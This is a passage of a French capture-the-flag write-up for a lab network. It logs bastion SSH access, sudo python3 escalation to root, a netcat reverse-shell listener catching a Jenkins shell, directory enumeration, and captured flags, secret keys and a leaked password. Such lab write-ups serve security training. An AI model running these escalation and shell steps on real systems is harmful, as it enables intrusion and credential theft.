30" -i rebond-privkey rebond@infra-05.ipssi.cloud Enter passphrase for key 'rebond-privkey': Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.8.4-3-pve x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro Last login: Tue May 28 15:15:05 2024 from 192.168.0.1 rebond@NewsLetter:~$ sudo python3 -c 'import os; os.system("su root")' root@NewsLetter:/home/rebond# nc -lvnp 4242 Listening on 0.0.0.0 4242 Connection received on 192.168.0.80 55808 $ $ pwd pwd /var/lib/jenkins/workspace/ContinuousIntegration $ sudo -l sudo -l Matching Defaults entries for jenkins on JenkinsCI: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User jenkins may run the following commands on JenkinsCI: (root) NOPASSWD: /usr/bin/python3 $ sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' root@JenkinsCI:/# ``` --- ## [Info] clef secret dans le jenkins 192.168.0.80 > /var/lib/jenkins/secret.key `424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76` ```bash root@JenkinsCI:~# cat /var/lib/jenkins/secret.key cat /var/lib/jenkins/secret.key 424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76 ``` --- ## [Flag] 192.168.0.100 flag.txt `FLAG{S0fCk1nEz??????}` > C:\Users\Administrator\Desktop\flag.txt ![image](https://hackmd.io/_uploads/Sy880_74C.png) --- ## [Flag] 192.168.0.123 8080/config.php `FLAG{0hMyLF1!!}` http://127.0.0.1:8080/config.php ```bash gobuster dir --url http://localhost:8080/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x php,html,css,js,sh,old,bac =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://localhost:8080/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: js,sh,old,bac,php,html,css [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta.html (Status: 403) [Size: 276] /.hta.js (Status: 403) [Size: 276] /.hta (Status: 403) [Size: 276] /.hta.bac (Status: 403) [Size: 276] /.hta.sh (Status: 403) [Size: 276] /.hta.php (Status: 403) [Size: 276] /.hta.old (Status: 403) [Size: 276] /.hta.css (Status: 403) [Size: 276] /.htaccess (Status: 403) [Size: 276] /.htaccess.old (Status: 403) [Size: 276] /.htaccess.bac (Status: 403) [Size: 276] /.htaccess.sh (Status: 403) [Size: 276] /.htaccess.css (Status: 403) [Size: 276] /.htaccess.php (Status: 403) [Size: 276] /.htaccess.html (Status: 403) [Size: 276] /.htpasswd (Status: 403) [Size: 276] /.htaccess.js (Status: 403) [Size: 276] /.htpasswd.sh (Status: 403) [Size: 276] /.htpasswd.js (Status: 403) [Size: 276] /.htpasswd.bac (Status: 403) [Size: 276] /.htpasswd.php (Status: 403) [Size: 276] /.htpasswd.old (Status: 403) [Size: 276] /.htpasswd.css (Status: 403) [Size: 276] /.htpasswd.html (Status: 403) [Size: 276] /admin.php (Status: 200) [Size: 72] /admin.php (Status: 200) [Size: 72] /config.php (Status: 200) [Size: 69] /index.php (Status: 200) [Size: 4340] /index.html (Status: 200) [Size: 10671] /index.html (Status: 200) [Size: 10671] /index.php (Status: 200) [Size: 4340] /server-status (Status: 403) [Size: 276] Progress: 37816 / 37816 (100.00%) ``` ![image](https://hackmd.io/_uploads/r13TPdV4R.png) ```bash $ curl http://localhost:8080/config.php //FLAG{0hMyLF1!!} //Head of cybersecurity password: uoddsfhhbhkdhhh8 ``` --- ## [Flag] commentaire 8080/index.php http://127.0.0.1:8080/index.php `FLAG{4h...C0mm3nts...}` ![image](https://hackmd.io/_uploads/SyXQfOV4R.png) ```html $ curl http://localhost:8080/index.php <!DOCTYPE html> <html lang="fr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Secte de la Bulle</title> <style> body { font-family: Arial, sans-serif; background-color: #f0f8ff; color: #333; margin: 0; padding: 0; } .navbar { background-color: #4682b4; overflow: hidden; } .navbar a { float: left; display: block; color: white; text-align: center; padding: 14px 20px; text-decoration: none; } .navbar a:hover { background-color: #5f9ea0; } .content { padding: 20px; } h1 { color: #4682b4; } h2 { color: #5f9ea0; } .testimonial { font-style: italic; margin: 20px 0; } .author { font-weight: bold; } </style> </head> <body> <div class="navbar"> <a href="index.php?p=bulle">Accueil</a> <a href="index.php?p=admin">Admin</a> </div> <div class="content"> <h1>Chers adeptes de la Bulle</h1> <!--4f 6d 23 66 70 c9 a2 73 6a 72 22 6b 61 77 ce ec 3f 63 6e 6e--> <p>Bienvenue sur notre blog sacré, le seul endroit en ligne où la clarté et la transparence prennent un sens littéral. Je suis votre humble et vénéré guide, le Maître des Bulles, et aujourd'hui, je souhaite vous éclairer sur notre mission sacrée et nos pratiques quotidiennes. Asseyez-vous confortablement dans votre bulle (gonflée à la pression recommandée, bien sûr), et laissez-moi vous emmener dans un voyage spirituel hors du commun.</p> <h2>Le Pouvoir de la Bulle</h2> <p>Pourquoi la Bulle, me demandez-vous? Ah, mes chers disciples, c’est parce que la bulle est l’incarnation même de la pureté et de l’élévation spirituelle. Contrairement aux gens ordinaires qui se contentent de respirer l'air pollué de la réalité, nous, les élus, flottons dans une bulle d’air pur et d'idées lumineuses. C'est dans cette bulle que nous trouvons la paix intérieure, la clarté mentale, et une très légère sensation de vertige.</p> <h2>Les Rituels Sacrés</h2> <p>Chaque matin, nous débutons notre journée par le Rituel du Souffle, où nous gonflons soigneusement notre bulle personnelle en utilisant la pompe sacrée (disponible dans notre boutique en ligne). Respirez profondément, sentez l'air entrer dans vos poumons, et soufflez lentement dans votre bulle. Répétez jusqu'à atteindre l'illumination... ou jusqu'à ce que vous ayez besoin de reprendre votre souffle.</p> <h2>Les Commandements de la Bulle</h2> <ol> <li>Tu ne feras pas éclater ta bulle, sauf en cas d’urgence spirituelle (ou de chaton mignon).</li> <li>Tu gonfleras ta bulle avec amour et respect, en utilisant seulement l'air le plus pur et les pompes approuvées par le Maître des Bulles.</li> <li>Tu flotteras avec grâce, évitant les obstacles matériels et les esprits négatifs.</li> <li>Tu propageras l'enseignement de la Bulle, en convertissant doucement (mais fermement) tes proches et voisins.</li> </ol> <h2>Témoignages</h2> <p class="testimonial">"Depuis que j'ai rejoint la Secte de la Bulle, ma vie a littéralement décollé!" - <span class="author">Jeanne, disciple de la Bulle</span></p> <p class="testimonial">"Je n'avais jamais ressenti une telle légèreté, sauf peut-être après un buffet à volonté." - <span class="author">Pierre, apôtre de l'Air</span></p> <h2>Rejoignez-nous!</h2> <p>Si vous sentez que votre vie manque d'élévation, que vos pensées sont trop ancrées dans la réalité ou que vous avez simplement envie de flotter un peu, rejoignez-nous! Nos portes (et nos bulles) sont grandes ouvertes. Venez découvrir la sérénité de la Bulle et laissez-vous emporter par notre courant d'air sacré.</p> <p>En attendant notre prochain grand souffle collectif, restez légers et bien gonflés!</p> <p>Votre Maître des Bulles,<br> Flottant avec sagesse et sérénité</p> <!-- FLAG{4h...C0mm3nts...} --> </div> </body> </html> ``` --- ## [Flag] Clef de registre dans l'AD `FLAG{r3gizi}` ```powershell if(@(Get-ChildItem HKLM: -Recurse |Where-Object {$_.PSChildName -eq 'RebootRequired'})) { # Something was returned! Create the file New-Item C:\Candi\RebootRequired.txt -ItemType File } ``` --- ## [Info] SSH 192.168.0.123 ![image](https://hackmd.io/_uploads/SkYoa_VNR.png) ![image](https://hackmd.io/_uploads/r13TPdV4R.png) | user | password | |---|---| | john | uoddsfhhbhkdhhh8 | ```bash $ ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 9000:192.168.0.123:22 Enter passphrase for key 'rebond-privkey': $ ssh -o "ServerAliveInterval 30" -p 9000 john@localhost The authenticity of host '[localhost]:9000 ([::1]:9000)' can't be established. ED25519 key fingerprint is SHA256:kTCO1tKcJjEfg+Zxs9uLzX/dGZTzHdYQgLqltUxU5SA. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[localhost]:9000' (ED25519) to the list of known hosts. john@localhost's password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.8.4-3-pve x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro Last login: Wed May 29 10:00:48 2024 from 192.168.0.2 john@Sect:~$ ``` --- ## [FLAG] Fichier cacher /home/john `FLAG{7h4tW4s34syr1ght?}` > /home/john/.flag ```bash john@Sect:~$ ls -la total 36 drwxr-x--- 4 john john 4096 May 28 14:41 . drwxr-xr-x 3 root root 4096 May 28 14:05 .. -rw------- 1 john john 412 May 29 09:36 .bash_history -rw-r--r-- 1 john john 220 May 28 14:05 .bash_logout -rw-r--r-- 1 john john 3771 May 28 14:05 .bashrc drwx------ 2 john john 4096 May 28 14:41 .cache -rw-rw-r-- 1 john john 24 May 28 14:07 .flag drwxrwxr-x 3 john john 4096 May 28 14:07 .local -rw-r--r-- 1 john john 807 May 28 14:05 .profile john@Sect:~$ cat .flag FLAG{7h4tW4s34syr1ght?} ``` ## [Flag] `FLAG{s3ct4ryBub113s}` ```bash john@Sect:~$ cat /var/www/html/admin.php <?php session_start(); if ($_COOKIE['authenticated'] == '1') { echo "Welcome, admin!"; echo "FLAG{s3ct4ryBub113s}"; } else { echo "Tu n'as pas l'air d'être suffisemment dédié à la bulle mon enfant..."; setcookie("authenticated","0"); } ?> ``` ![image](https://hackmd.io/_uploads/SJRoxK44R.png) ![image](https://hackmd.io/_uploads/rkoRgYVVA.png)